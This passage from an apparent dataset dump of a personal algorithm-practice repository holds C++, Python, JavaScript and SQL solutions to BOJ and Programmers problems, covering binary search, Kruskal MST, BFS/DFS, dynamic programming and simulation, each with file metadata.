ch.end());\n ch.erase(unique(ch.begin(), ch.end()), ch.end());\n\n vector<int> number;\n //vector<int> number(ch.size()); => 시간 초과\n\n for(int i = 0 ; i < ch.size() ; i++){\n 
number.push_back(9 - i);\n }\n\n sort(number.begin(), number.end());\n\n do{\n int sum=0;\n\n for(int i = 0 ; i < ch.size() ; i++){\n alpha[ch[i]] = number[i];\n }\n\n for(int i = 0 ; i < word.size() ; i++){\n int res = 0;\n for(int j = 0 ; j < word[i].length() ; j++){\n res = res * 10 + alpha[word[i][j]];\n }\n sum += res;\n }\n\n maximum = max(maximum, sum);\n\n }while(next_permutation(number.begin(), number.end()));\n\n cout << maximum;\n\n return 0; \n}" }, { "alpha_fraction": 0.4552631676197052, "alphanum_fraction": 0.4894736707210541, "avg_line_length": 15.565217018127441, "blob_id": "1ecf06b4bfe41228be55d52517f683987ee605a1", "content_id": "dccdf5e2d0ce2c94145c7a34036cb38b4e6cd038", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 406, "license_type": "no_license", "max_line_length": 34, "num_lines": 23, "path": "/programmers/Level 1/middle_letter.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//programmers Level 1: 가운데 글자 가져오기\n//2021-10-08\n#include <string>\n#include <vector>\n\nusing namespace std;\n\nstring solution(string s) {\n string answer = \"\";\n int idx = s.length() / 2;\n \n if(s.length() % 2 == 0) {\n //짝수\n answer += s[idx - 1];\n answer += s[idx];\n }\n else {\n //홀수\n answer += s[idx];\n }\n \n return answer;\n}" }, { "alpha_fraction": 0.34927114844322205, "alphanum_fraction": 0.3749271035194397, "avg_line_length": 27.131147384643555, "blob_id": "180ffdcd01de3c236d5a5daddc37c075456786ce", "content_id": "316088d903bbe72b15a9e7c6d61a6721a00a7aac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1715, "license_type": "no_license", "max_line_length": 79, "num_lines": 61, "path": "/programmers/Level 1/push_keypad.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//programmers Level 1 : Push keypad\n//2020 KAKAO Internship\n//2021-04-28\n#include <string>\n#include <vector>\n#include <cmath>\n\nusing namespace std;\n\nstring solution(vector<int> numbers, string hand) {\n string answer = \"\";\n int left_x=3, left_y=0, right_x=3, right_y=2;\n \n for(int i = 0 ; i < numbers.size() ; i++){\n if(numbers[i] == 1 || numbers[i] == 4 || numbers[i] == 7){ //1 4 7\n answer += 'L';\n left_x = numbers[i] / 3;\n left_y = 0;\n }\n else if(numbers[i] == 3 || numbers[i] == 6 || numbers[i] == 9){ //3 6 9\n answer += 'R';\n right_x = numbers[i] / 3 - 1;\n right_y = 2;\n }\n else{ //2 5 8 0\n if(numbers[i] == 0)\n numbers[i] = 11;\n \n int tmp_x = numbers[i] / 3;\n int tmp_y = 1;\n int dstLeft = abs(tmp_x-left_x) + abs(tmp_y - left_y);\n int dstRight = abs(tmp_x-right_x) + abs(tmp_y-right_y);\n \n if(dstLeft < dstRight) {\n answer += 'L';\n left_x = tmp_x;\n left_y = tmp_y;\n }\n else if(dstLeft > dstRight){\n answer += 'R';\n right_x = tmp_x;\n right_y = tmp_y;\n }\n else{\n if(hand == \"left\"){\n answer += 'L';\n left_x = tmp_x;\n left_y = tmp_y;\n }\n else if(hand == \"right\"){\n answer += 'R';\n right_x = tmp_x;\n right_y = tmp_y;\n }\n }\n \n }\n }\n \n return answer;\n}" }, { "alpha_fraction": 0.5526315569877625, "alphanum_fraction": 0.5986841917037964, "avg_line_length": 24.41666603088379, "blob_id": "7977d5d1d360c9a129ab409b802c5732b68e1eca", "content_id": "4d5e0826ad0632bedb86f38952799f543b57d2cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 346, "license_type": "no_license", "max_line_length": 117, "num_lines": 12, "path": "/programmers/Level 
1/number_strings_and_english_words.js", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 1: 숫자 문자열과 영단어\n2021 카카오 채용연계형 인턴십\n2021-12-21\n*/\nfunction solution(s) {\n const arr = [/zero/gi, /one/gi, /two/gi, /three/gi, /four/gi, /five/gi, /six/gi, /seven/gi, /eight/gi, /nine/gi];\n\n for (let i = 0; i < arr.length; i++) s = s.replace(arr[i], i)\n\n return parseInt(s);\n}" }, { "alpha_fraction": 0.38256657123565674, "alphanum_fraction": 0.4140435755252838, "avg_line_length": 16.595745086669922, "blob_id": "38276a9816dc2ae93c03e71ca693061c07396248", "content_id": "8d64cfe8849e7887e42899bbc7b3090c7cf454e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 838, "license_type": "no_license", "max_line_length": 58, "num_lines": 47, "path": "/BOJ/Binary Search/2805.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//BOJ 2805번: 나무 자르기\n//2021-05-25\n//Binary Search\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n long long n, m, max=-1;\n cin >> n >> m;\n\n int arr[n];\n for(int i = 0 ; i < n ; i++){\n cin >> arr[i];\n }\n\n sort(arr, arr+n);\n\n long long start = 0;\n long long end = arr[n - 1];\n long long mid;\n\n while(start <= end){\n long long sum = 0;\n mid = (start + end) / 2;\n\n for(int i = 0 ; i < n ; i++){\n if(arr[i] - mid > 0)\n sum += arr[i] - mid;\n }\n\n if(sum >= m){\n start = mid + 1;\n if(mid > max)\n max = mid;\n }\n else{\n end = mid - 1;\n }\n\n }\n\n cout << max;\n \n return 0;\n}" }, { "alpha_fraction": 0.49735450744628906, "alphanum_fraction": 0.5155790448188782, "avg_line_length": 20.54430389404297, "blob_id": "485c46e6435e68d8c33d40d3e5fbaef8ee067501", "content_id": "30bdae48f9692f0bc187c7549b667479d372adff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1715, "license_type": "no_license", "max_line_length": 78, "num_lines": 79, "path": "/BOJ/MST/4386.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 4386번: 별자리 만들기\n2021-12-29\nKruskal Algorithm\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#include <math.h>\n#define MAX 101\nusing namespace std;\n\nvector<pair<double, double>> coordinate;\nvector<pair<double, pair<double, double>>> edge;\nint parent[MAX];\n\nint getParent(int x) {\n if(parent[x] == x) return x;\n return parent[x] = getParent(parent[x]);\n}\n\nvoid unionParent(int a, int b) {\n a = getParent(a);\n b = getParent(b);\n\n if(a < b) parent[b] = a;\n else parent[a] = b;\n}\n\nint findParent(int a, int b) {\n a = getParent(a);\n b = getParent(b);\n\n if(a == b) return 1;\n else return 0;\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0); \n double ans = 0;\n int n;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++) {\n double x, y;\n cin >> x >> y;\n coordinate.push_back({x, y});\n }\n\n for(int i = 0 ; i < coordinate.size() ; i++) {\n double x_a = coordinate[i].first;\n double y_a = coordinate[i].second;\n\n for(int j = i + 1 ; j < coordinate.size() ; j++){\n double x_b = coordinate[j].first;\n double y_b = coordinate[j].second;\n \n double distance = sqrt(pow((x_b - x_a), 2) + pow((y_b - y_a), 2));\n edge.push_back({distance, {i + 1, j + 1}});\n }\n }\n\n sort(edge.begin(), edge.end());\n for(int i = 1 ; i <= n ; i++) parent[i] = i;\n\n for(int i = 0 ; i < edge.size() ; i++) {\n int a = edge[i].second.first;\n int b = 
edge[i].second.second;\n double c = edge[i].first;\n\n if(findParent(a, b)) continue;\n unionParent(a, b);\n ans += c;\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.40582525730133057, "alphanum_fraction": 0.4407767057418823, "avg_line_length": 18.452829360961914, "blob_id": "02bfb8fb89328f9deb1905581b8f6e07243afe0b", "content_id": "27170bde7d2be2abf0886e7e1dd8ae66344192b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1068, "license_type": "no_license", "max_line_length": 70, "num_lines": 53, "path": "/BOJ/BFS_DFS/14889.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 14889번: 스타트와 링크\nDATE: 2022-02-04\nBacktracking\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint n, minVal = 1e9;\nint arr[21][21];\nbool visited[21]; // 팀 배정\n\nvoid dfs(int cnt, int num) {\n if(cnt == n / 2) {\n int start = 0, link = 0;\n\n for(int i = 1 ; i <= n ; i++) {\n for(int j = 1 ; j <= n ; j++) {\n if(visited[i] && visited[j]) start += arr[i][j];\n else if(!visited[i] && !visited[j]) link += arr[i][j];\n }\n }\n\n minVal = min(minVal, abs(start - link));\n\n return;\n }\n\n for(int i = num ; i < n ; i++) { // n을 포함하면 중복 발생\n if(visited[i]) continue;\n\n visited[i] = true;\n dfs(cnt + 1, i + 1);\n visited[i] = false;\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0); \n cin >> n;\n\n for(int i = 1 ; i <= n ; i++){\n for(int j = 1 ; j <= n ; j++){\n cin >> arr[i][j];\n }\n }\n\n dfs(0, 1); \n cout << minVal;\n\n return 0;\n}" }, { "alpha_fraction": 0.686956524848938, "alphanum_fraction": 0.7200000286102295, "avg_line_length": 25.136363983154297, "blob_id": "49422fbb7f8c4d3ee12991b0c736c13acbd9c019", "content_id": "fa63b836765945cc31a701a3030b576c8aa033a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1224, "license_type": "no_license", "max_line_length": 92, "num_lines": 44, "path": "/programmers/SQL/JOIN.md", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# JOIN\n\n**[1. 없어진 기록 찾기 (Level 3)](https://programmers.co.kr/learn/courses/30/lessons/59042)**\n\n```sql\nSELECT OUTS.ANIMAL_ID, OUTS.NAME\nFROM ANIMAL_INS INS RIGHT JOIN ANIMAL_OUTS OUTS ON INS.ANIMAL_ID = OUTS.ANIMAL_ID\nWHERE INS.ANIMAL_ID IS NULL\nORDER BY INS.ANIMAL_ID\n```\n\n<br/>\n\n**[2. 있었는데요 없었습니다 (Level 3)](https://programmers.co.kr/learn/courses/30/lessons/59043)**\n\n```sql\nSELECT INS.ANIMAL_ID, INS.NAME\nFROM ANIMAL_INS INS INNER JOIN ANIMAL_OUTS OUTS ON INS.ANIMAL_ID = OUTS.ANIMAL_ID\nWHERE INS.DATETIME > OUTS.DATETIME\nORDER BY INS.DATETIME\n```\n\n<br/>\n\n**[3. 오랜 기간 보호한 동물(1) (Level 3)](https://programmers.co.kr/learn/courses/30/lessons/59044)**\n\n```sql\nSELECT INS.NAME, INS.DATETIME\nFROM ANIMAL_INS INS LEFT JOIN ANIMAL_OUTS OUTS ON INS.ANIMAL_ID = OUTS.ANIMAL_ID\nWHERE OUTS.ANIMAL_ID IS NULL\nORDER BY INS.DATETIME\nLIMIT 3\n```\n\n<br/>\n\n**[4. 
보호소에서 중성화한 동물 (Level 4)](https://programmers.co.kr/learn/courses/30/lessons/59045)**\n\n```sql\nSELECT INS.ANIMAL_ID, INS.ANIMAL_TYPE, INS.NAME\nFROM ANIMAL_INS INS INNER JOIN ANIMAL_OUTS OUTS ON INS.ANIMAL_ID = OUTS.ANIMAL_ID\nWHERE INS.SEX_UPON_INTAKE != OUTS.SEX_UPON_OUTCOME\nORDER BY INS.ANIMAL_ID\n```\n" }, { "alpha_fraction": 0.4602609872817993, "alphanum_fraction": 0.4887307286262512, "avg_line_length": 17.755556106567383, "blob_id": "b862c28deecb012ed3cfe98ecbe671b0376807f2", "content_id": "1994407b0c62a59eba2d823a3015b342750dacd3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 853, "license_type": "no_license", "max_line_length": 85, "num_lines": 45, "path": "/programmers/Level 3/connecting_islands.py", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# programmers Level 3: 섬 연결하기\n# date: 2022-06-11\nparent = []\n\ndef getParent(x):\n if x == parent[x]: \n return x\n parent[x] = getParent(parent[x])\n return parent[x]\n\ndef findParent(a, b):\n a = getParent(a)\n b = getParent(b)\n \n if a == b: \n return 1\n else:\n return 0\n \ndef unionParent(a, b):\n a = getParent(a)\n b = getParent(b)\n \n if a < b:\n parent[b] = a\n else:\n parent[a] = b\n\ndef solution(n, costs):\n answer = 0\n \n for i in range(n + 1):\n parent.append(i)\n \n for i in range(len(costs)):\n costs[i][0], costs[i][1], costs[i][2] = costs[i][2], costs[i][0], costs[i][1]\n \n costs.sort()\n \n for i in costs:\n if not findParent(i[1], i[2]):\n unionParent(i[1], i[2])\n answer += i[0]\n \n return answer" }, { "alpha_fraction": 0.3847549855709076, "alphanum_fraction": 0.43557170033454895, "avg_line_length": 17.399999618530273, "blob_id": "9375f90af62fd6f5d4c36e270ea01f1ea5f0ba16", "content_id": "c106686b83ed0c50338beda22d20f98d25c6821a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 577, "license_type": "no_license", "max_line_length": 58, "num_lines": 30, "path": "/BOJ/Mathematics/1929.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1929번: 소수 구하기\nDATE: 2021-10-10\n*/\n#include <iostream>\n#include <math.h>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int arr[1000001];\n int m, n;\n cin >> m >> n;\n\n for(int i = 2 ; i <= n ; i++) {\n arr[i] = i;\n }\n\n for(int i = 2 ; i <= sqrt(n) ; i++) {\n if(arr[i] == 0) continue; //이미 소수가 아님\n\n for(int j = i * i ; j <= n ; j += i) arr[j] = 0;\n }\n\n for(int i = m ; i <= n ; i++) {\n if(arr[i] != 0) cout << arr[i] << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.41812562942504883, "alphanum_fraction": 0.4479917585849762, "avg_line_length": 19.4526309967041, "blob_id": "fcdbaf66915e9f65739fc99018a8331f483728b5", "content_id": "1ea9cfcbbd534755a480eddbbcdb8a2f89e9d218", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2090, "license_type": "no_license", "max_line_length": 69, "num_lines": 95, "path": "/BOJ/Implementation/3190.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 3190번: 뱀\nDATE: 2022-03-24\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#define MAX 101\nusing namespace std;\n\nint n;\nint board[MAX][MAX]; // 0: 빈 칸, 1: 뱀, -1: 사과 \nvector<pair<int, char>> rotation;\nvector<pair<int,int>> snake;\nint dr[4] = {0, 1, 0, -1};\nint dc[4] = {1, 0, -1, 0};\n\nbool check_range(int r, int c){\n if(r < 1 || c < 1 || r > n || c > n) return 
false; // 벽에 부딪힌 경우\n if(board[r][c] == 1) return false; // 몸에 부딪히는 경우\n return true;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int k, l;\n int r, c, x;\n char ch;\n\n cin >> n >> k;\n\n int hr = 1, hc = 1;\n int dir = 0;\n\n board[1][1] = 1;\n snake.push_back({1, 1});\n\n while(k--){\n cin >> r >> c;\n board[r][c] = -1;\n }\n\n cin >> l;\n\n while(l--){\n cin >> x >> ch;\n rotation.push_back({x, ch});\n }\n\n sort(rotation.begin(), rotation.end());\n\n int sec = 1;\n\n while(1){\n bool apple = false;\n\n // 1. 머리 다음칸으로 이동\n int new_hr = hr + dr[dir];\n int new_hc = hc + dc[dir];\n\n if(!check_range(new_hr, new_hc)) break; // 종료\n if(board[new_hr][new_hc] == -1) apple = true; // 이동한 칸에 사과 존재\n\n board[new_hr][new_hc] = 1;\n snake.insert(snake.begin(), {new_hr, new_hc}); // 바뀐 머리 위치 삽입\n hr = new_hr;\n hc = new_hc;\n\n // 2. 이동한 칸에 사과 없는 경우 => 꼬리 위치한 칸 비워줌\n if(!apple) {\n board[snake.back().first][snake.back().second] = 0;\n snake.pop_back();\n }\n \n // 3. 방향 회전\n if(rotation.front().first == sec){\n if(rotation.front().second == 'D'){\n if(dir == 3) dir = 0;\n else dir += 1;\n }\n else{ \n if(dir == 0) dir = 3;\n else dir -= 1;\n }\n\n rotation.erase(rotation.begin());\n }\n\n sec++;\n }\n\n cout << sec;\n\n return 0;\n}" }, { "alpha_fraction": 0.35209712386131287, "alphanum_fraction": 0.40176600217819214, "avg_line_length": 18.717391967773438, "blob_id": "797889d469e95f4b946aeffaa7e0c789e966920c", "content_id": "9fce1b0140a2cf46edc577a6fdda9ee59adbfdb4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 940, "license_type": "no_license", "max_line_length": 67, "num_lines": 46, "path": "/BOJ/Brute Force/15954.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 15954번: 인형들\nDATE: 2021-02-01\n*/\n#include <iostream>\n#include <cmath>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int arr[500];\n int n, k;\n cin >> n >> k;\n\n long double MIN = 10000000000000000;\n\n for(int i = 0 ; i < n ; i++){\n cin >> arr[i];\n }\n\n while(k <= n){\n for(int i = 0 ; i < n-k+1 ; i++){\n long double sum=0, m, variance, std;\n\n for(int j = i ; j < k+i ; j++){ //연속된 k개의 수 합\n sum += arr[j];\n }\n \n m = sum / k;\n \n sum = 0;\n for(int j = i ; j < k+i ; j++) sum += pow(arr[j]-m, 2);\n \n variance = sum / k; //분산\n std = sqrt(variance); //표준편차\n MIN = min(MIN, std);\n }\n\n k++;\n }\n \n cout.precision(11);\n cout << fixed << MIN;\n \n return 0;\n}" }, { "alpha_fraction": 0.3757396340370178, "alphanum_fraction": 0.40976330637931824, "avg_line_length": 20.140625, "blob_id": "ee3f3f03e1a4d7b58b7ac4db966ec632e5ac9ee9", "content_id": "1f92e8bad299d82e781e3c62387a039d75f1bbf4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1378, "license_type": "no_license", "max_line_length": 75, "num_lines": 64, "path": "/BOJ/BFS_DFS/7562.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 7562번: 나이트의 이동\nDATE: 2021-01-25\nBFS\n*/\n#include <iostream>\n#include <queue>\n#include <string.h>\n#define MAX 300\n\nusing namespace std;\nint chess[MAX][MAX];\n//시계 반대 방향\nint dx[] = { -2, -1, 1, 2, 2, 1, -1, -2 };\nint dy[] = { -1, -2, -2, -1, 1, 2, 2, 1 };\nint l, str_x, str_y, dst_x, dst_y;\n\nvoid bfs() {\n queue<pair<int, int>> q;\n pair<int, int> p;\n\n q.push(make_pair(str_x, str_y));\n\n while (!q.empty()) {\n p = q.front();\n q.pop();\n\n if (p.first == dst_x && p.second == dst_y) 
{\n cout << chess[dst_x][dst_y] - 1 << \"\\n\";\n break;\n }\n\n for (int i = 0; i < 8; i++) {\n int nx = p.first + dx[i];\n int ny = p.second + dy[i];\n \n if(nx < 0 || ny < 0 || nx >= l || ny >= l)\n continue;\n if (nx >= 0 && ny >= 0 && nx < l && ny < l && !chess[nx][ny]) {\n q.push(make_pair(nx, ny));\n chess[nx][ny] = chess[p.first][p.second] + 1;\n }\n }\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int t;\n cin >> t;\n\n for (int i = 0; i < t; i++) {\n cin >> l;\n cin >> str_x >> str_y;\n cin >> dst_x >> dst_y;\n\n memset(chess, 0, sizeof(chess));\n chess[str_x][str_y] = 1;\n \n bfs();\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.43562230467796326, "alphanum_fraction": 0.504291832447052, "avg_line_length": 12.735294342041016, "blob_id": "6c38a0e0e9e80d2b091a92bc9e1c9ff5167a10c3", "content_id": "45d2894983816ee211858b39a728327c1d9de837", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 480, "license_type": "no_license", "max_line_length": 58, "num_lines": 34, "path": "/BOJ/Implementation/1110.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1110번: 더하기 사이클\n2021-03-23\n*/\n#include <iostream>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n\tint n, units, tens, num, cycle=0;\n\tcin >> n;\n\n\tnum = n;\n \n\twhile (1) {\n\t\tcycle++;\n\n\t\tif (num < 10) {\n\t\t\tnum = 10 * num + num;\n\t\t}\n\t\telse if (num >=10) {\n\t\t\tunits = num % 10;\n\t\t\ttens = num / 10;\n\t\t\tnum = 10 * units + (units+tens)%10;\n\t\t}\n\n\t\tif (num == n) {\n\t\t\tcout << cycle << \"\\n\";\n\t\t\tbreak;\n\t\t}\n\t}\n\n\treturn 0;\n}" }, { "alpha_fraction": 0.30705395340919495, "alphanum_fraction": 0.3286307156085968, "avg_line_length": 18.770492553710938, "blob_id": "3fee39d55d6ed0404ce6ac134a10013919078218", "content_id": "1dd94a4765fdfb9239891d02c6c9f2757eb7eb09", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1237, "license_type": "no_license", "max_line_length": 87, "num_lines": 61, "path": "/BOJ/Binary Search/2512.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//BOJ 2512번: 예산\n//2021-05-25\n//Binary Search\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, m, sum=0, ans=-1;\n cin >> n;\n\n int arr[n];\n for(int i = 0 ; i < n ; i++){\n cin >> arr[i];\n sum += arr[i];\n }\n\n sort(arr, arr+n);\n\n cin >> m;\n\n if(sum <= m){\n cout << arr[n - 1];\n }\n else{\n int start = 0;\n int end = m;\n int mid;\n\n while(start <= end){\n //mid => Ư���� ���� ���Ѿ�\n sum = 0;\n mid = (start + end) / 2;\n\n for(int i = 0 ; i < n ; i++){\n if(arr[i] <= mid)\n sum += arr[i];\n else\n sum += mid;\n }\n \n cout << \"start: \" << start << \" end: \" << end << \" [mid: \" << mid << \"]\\n\";\n cout << \"sum: \" << sum << \"\\n\\n\";\n\n if(sum <= m){\n start = mid + 1;\n if(mid > ans) \n ans = mid;\n }\n else if(sum > m){\n end = mid - 1;\n }\n }\n\n cout << ans;\n\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.3388090431690216, "alphanum_fraction": 0.37029433250427246, "avg_line_length": 19.30555534362793, "blob_id": "fc571c6be8f700862f5e882fe8c8debdef40080e", "content_id": "7137d758717dcdc6ded3f88fa1288f03260abe8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1471, "license_type": "no_license", "max_line_length": 70, 
"num_lines": 72, "path": "/BOJ/BFS_DFS/2468.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 2468번: 안전 영역\nDATE: 2021-02-06\nDFS\n*/\n#include <iostream>\n#include <cstring>\n#include <vector>\n#include <algorithm>\n#define MAX 101\nusing namespace std;\n\nint area[MAX][MAX];\nint tmp[MAX][MAX];\nint dx[] = {-1, 0, 1, 0};\nint dy[] = {0, 1, 0, -1};\nint n;\n\nvoid dfs(int x, int y){\n tmp[x][y] = 0;\n \n for(int i = 0 ; i < 4 ; i++){\n int nx = x + dx[i];\n int ny = y + dy[i];\n if(nx >= 0 && ny >= 0 && nx < n && ny < n && tmp[nx][ny] == 1)\n dfs(nx, ny);\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int ans = -1, max_value = 0;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++){\n for(int j = 0 ; j < n ; j++){\n cin >> area[i][j];\n max_value = max(area[i][j], max_value);\n }\n }\n\n memcpy(tmp, area, sizeof(area));\n\n for(int k = 0 ; k < max_value ; k++){\n int cnt = 0;\n\n for(int i = 0 ; i < n ; i++){\n for(int j = 0 ; j < n ; j++){\n if(area[i][j] <= k){\n tmp[i][j] = 0;\n }\n else tmp[i][j] = 1;\n }\n }\n\n for(int i = 0 ; i < n ; i++){\n for(int j = 0 ; j < n ; j++){\n if(tmp[i][j] == 1){\n cnt++;\n dfs(i, j);\n }\n }\n }\n \n memcpy(tmp, area, sizeof(area));\n ans = max(ans, cnt);\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.34015747904777527, "alphanum_fraction": 0.38792651891708374, "avg_line_length": 23.126583099365234, "blob_id": "d2dc8427a6e696c9da9431b21688d650a4434268", "content_id": "05c47a27de9178c34a85686c08b7b7afbda1e317", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2017, "license_type": "no_license", "max_line_length": 80, "num_lines": 79, "path": "/BOJ/Implementation/14500.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 14500번: 테트로미노\nDATE: 2021-10-13\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint ans = -1;\nint n, m;\nint dx[4] = {-1, 0, 1, 0};\nint dy[4] = {0, 1, 0, -1};\nint arr[500][500] = {0, }, visited[500][500] = {0, };\n\nvoid solve_shape(int x, int y) { // ㅜ 모양은 dfs가 불가능\n if(x >= 0 && x + 1 < n && y >= 0 && y + 2 < m) {\n // ㅜ\n ans = max(ans, arr[x][y] + arr[x][y+1] + arr[x][y+2] + arr[x+1][y+1]);\n }\n if(x - 1 >= 0 && x + 1 < n && y >= 0 && y + 1 < m) {\n // ㅓ\n ans = max(ans, arr[x][y] + arr[x][y+1] + arr[x+1][y+1] + arr[x-1][y+1]);\n }\n if(x - 1 >= 0 && x < n && y >= 0 && y + 2 < m) {\n // ㅗ\n ans = max(ans, arr[x][y] + arr[x][y+1] + arr[x][y+2] + arr[x-1][y+1]);\n }\n if(x >= 0 && x + 2 < n && y >= 0 && y + 1 < m) {\n // ㅏ\n ans = max(ans, arr[x][y] + arr[x+1][y] + arr[x+2][y] + arr[x+1][y+1]);\n }\n}\n\nvoid solve(int x, int y, int length, int sum) {\n if(length == 4) {\n ans = max(ans, sum);\n return;\n }\n\n for(int i = 0; i < 4 ; i++) {\n int nx = x + dx[i];\n int ny = y + dy[i];\n\n if(nx < 0 || ny < 0 || nx >= n || ny >= m || visited[nx][ny]) continue;\n visited[nx][ny] = 1;\n solve(nx, ny, length + 1, sum + arr[nx][ny]);\n visited[nx][ny] = 0; //대칭, 회전 위해서는 다시 방문해야함\n }\n\n return;\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> n >> m;\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < m ; j++) {\n cin >> arr[i][j];\n }\n }\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < m ; j++) {\n // ㅜ 모양\n solve_shape(i, j);\n\n // 나머지 모양\n visited[i][j] = 1;\n solve(i, j, 1, arr[i][j]);\n visited[i][j] = 0; // 대칭, 회전 위해서는 다시 방문해야함\n }\n }\n\n cout << ans;\n\n return 0;\n}" }, { 
"alpha_fraction": 0.30854272842407227, "alphanum_fraction": 0.364824116230011, "avg_line_length": 22.162790298461914, "blob_id": "f059ebe2e309e8576bf43360310ac46ca2dea3ee", "content_id": "9155026197822dc7b062bca8260bca20e596d98e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1011, "license_type": "no_license", "max_line_length": 115, "num_lines": 43, "path": "/BOJ/Dynamic Programming/9184.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 9184번: 신나는 함수 실행\nDATE: 2021-05-28\nDynamic programming\n*/\n#include <iostream>\nusing namespace std;\nint dp[21][21][21];\n\nint w(int a, int b, int c){\n if(a <= 0 || b <= 0 || c <= 0)\n return 1;\n else if(a > 20 || b > 20 || c > 20)\n return w(20, 20, 20);\n else if(a < b && b < c){\n if(dp[a][b][c] != 0)\n return dp[a][b][c];\n else\n return dp[a][b][c] = w(a, b, c - 1) + w(a, b - 1, c - 1) - w(a, b - 1, c);\n }\n else{\n if(dp[a][b][c] != 0)\n return dp[a][b][c];\n else\n return dp[a][b][c] = w(a - 1, b, c) + w(a - 1, b - 1, c) + w(a - 1, b, c - 1) - w(a - 1, b - 1, c - 1);\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n\n while(1){\n int a, b, c;\n cin >> a >> b >> c;\n\n if(a == -1 && b == -1 && c == -1)\n break;\n \n cout << \"w(\" << a << \", \" << b << \", \" << c << \") = \" << w(a, b, c) << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.44920843839645386, "alphanum_fraction": 0.4696570038795471, "avg_line_length": 22.703125, "blob_id": "9bc69b4a26ea07fbdbd00049725ed0afc4555a86", "content_id": "ef5f4d6ebd5cf93a999b60ef9a8622b63bdced69", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1714, "license_type": "no_license", "max_line_length": 80, "num_lines": 64, "path": "/BOJ/Sliding Window/3078.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 3078번: 좋은 친구\nDATE: 2022-01-19\nSliding Window\n*/\n#include <iostream>\n#include 